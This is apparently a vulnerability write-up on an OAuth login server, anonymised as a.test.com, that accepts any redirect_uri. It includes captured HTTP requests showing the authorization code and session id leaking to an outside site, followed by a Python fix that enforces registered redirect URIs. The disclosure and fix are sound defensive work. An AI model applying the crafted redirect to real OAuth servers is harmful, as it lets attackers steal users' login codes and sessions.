0x00 Preface

All project addresses in this article have been changed to a.test.com, to protect the vendor and to protect myself.

0x01 Summary

Vulnerable URL: http://a.test.com:8087/oauthserver/?client_id=7D4A4A2C4B701548F97FA88C379447BA&state=1&response_type=code&redirect_uri=http://baidu.com
The redirect_uri parameter is not validated at all, so the token can be delivered to an arbitrary URL.
[Screenshot: 1.png]

0x02 Request packets

0x02.1 Request 1:

Request:

  POST http://a.test.com:8087/oauthserver/loginAction.action HTTP/1.1
  Host: a.test.com:8087
  Connection: keep-alive
  Content-Length: 196
  Cache-Control: max-age=0
  Origin: http://a.test.com:8087
  Upgrade-Insecure-Requests: 1
  DNT: 1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  Referer: http://a.test.com:8087/oauthserver/?client_id=7D4A4A2C4B701548F97FA88C379447BA&state=1&response_type=code&redirect_uri=http://baidu.com
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  Cookie: cookie不能给你哦~

  user.redirect_uri=http%3A%2F%2Fbaidu.com&user.response_type=&user.client_id=7D4A4A2C4B701548F97FA88C379447BA&user.state=&user.scope=&user.resource_url=&user.account=tsetaaaa&user.password=tsetaaaa

Response:

  HTTP/1.1 302 Found
  Server: Apache-Coyote/1.1
  Set-Cookie: JSESSIONID=2006E057AE8523895F2DB0F85A84E321; Path=/oauthserver; Secure; HttpOnly
  Location: http://baidu.com?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa
  Content-Length: 0
  Date: Tue, 19 Mar 2019 08:56:42 GMT

0x02.2 Request 2:

Request:

  GET http://baidu.com/?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa HTTP/1.1
  Host: baidu.com
  Connection: keep-alive
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  DNT: 1
  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  Referer: http://a.test.com:8087/oauthserver/?client_id=7D4A4A2C4B701548F97FA88C379447BA&state=1&response_type=code&redirect_uri=http://baidu.com
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  Cookie: cookie不能给你哦~

Response:

  HTTP/1.1 302 Moved Temporarily
  Server: bfe/1.0.8.18
  Date: Tue, 19 Mar 2019 08:56:43 GMT
  Content-Type: text/html
  Content-Length: 161
  Connection: Keep-Alive
  Location: https://www.baidu.com/?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa
  Expires: Wed, 20 Mar 2019 08:56:43 GMT
  Cache-Control: max-age=86400
  Cache-Control: privae

  <html>
  <head><title>302 Found</title></head>
  <body bgcolor="white">
  <center><h1>302 Found</h1></center>
  <hr><center>bfe/1.0.8.18</center>
  </body>
  </html>

The user's login token ends up at: https://www.baidu.com/?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa
[Screenshot: 2.png]
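The root cause above is that the authorization server honours whatever redirect_uri the browser submits. The following is an added example (written for this page, not code from the writeup or from the vendor's oauthserver) of what the authorization endpoint should do instead: look up the redirect URIs registered for the client_id, compare after strict canonicalisation, and on mismatch answer with an error page rather than a 302, so no code or session id can travel to an unregistered host. The client registry, the callback URL https://app.example/callback, and the function names are assumptions; the client_id is the one shown in the packets.

```python
import secrets
from typing import Optional
from urllib.parse import urlsplit, urlencode

# Constructed sample registry (assumption, not the vendor's data): each
# client_id maps to the exact redirect URIs registered for it.
REGISTERED_REDIRECTS = {
    "7D4A4A2C4B701548F97FA88C379447BA": {"https://app.example/callback"},
}


def normalize_redirect_uri(uri: str) -> Optional[str]:
    """Canonicalise a redirect_uri for exact-match comparison.

    Returns None for anything that must never be used as a redirect target:
    non-https schemes, userinfo ("registered.host@evil.host" lookalikes),
    fragments, and dot-segments in the path.
    """
    try:
        parts = urlsplit(uri)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return None
    if parts.scheme != "https":
        return None
    if parts.username is not None or parts.password is not None:
        return None
    if parts.fragment or not parts.hostname:
        return None
    path = parts.path or "/"
    if any(seg in ("..", ".") for seg in path.split("/")):
        return None
    host = parts.hostname  # urlsplit already lowercases the host
    netloc = host if port in (None, 443) else f"{host}:{port}"
    query = f"?{parts.query}" if parts.query else ""
    return f"https://{netloc}{path}{query}"


def is_registered_redirect(client_id: str, redirect_uri: str) -> bool:
    """Exact-match policy: the canonical URI must equal a registered one.

    No prefix, suffix or substring matching: those are exactly the checks
    that open redirects and path tricks slip through.
    """
    canonical = normalize_redirect_uri(redirect_uri)
    if canonical is None:
        return False
    allowed = {normalize_redirect_uri(u)
               for u in REGISTERED_REDIRECTS.get(client_id, ())}
    allowed.discard(None)
    return canonical in allowed


def authorize(client_id: str, redirect_uri: str, state: str = "") -> dict:
    """Authorization-endpoint decision for the code flow, after the user
    has authenticated.

    On an invalid redirect_uri the server returns an error page and does
    NOT redirect (RFC 6749 section 4.1.2.1). On success it issues a
    one-time code and redirects only to the registered URI, echoing state.
    """
    if not is_registered_redirect(client_id, redirect_uri):
        return {"status": 400, "error": "invalid_request",
                "error_description": "redirect_uri is not registered for this client"}
    canonical = normalize_redirect_uri(redirect_uri)
    # In a real server the code is stored with client_id and redirect_uri so
    # the token endpoint can re-check both before exchanging it.
    code = secrets.token_hex(16)
    params = {"code": code}
    if state:
        params["state"] = state
    sep = "&" if "?" in canonical else "?"
    return {"status": 302, "location": canonical + sep + urlencode(params)}


if __name__ == "__main__":
    cid = "7D4A4A2C4B701548F97FA88C379447BA"
    # The writeup's input: rejected with 400, nothing is sent to baidu.com.
    print(authorize(cid, "http://baidu.com", state="1"))
    # The registered callback: 302 to the registered URI with code and state.
    print(authorize(cid, "https://app.example/callback", state="1"))
```

Note that the comparison also covers the session identifier leaked in the packets above: because the only redirect the server ever emits is to a registered URI, whatever it appends to the Location header stays with the legitimate client.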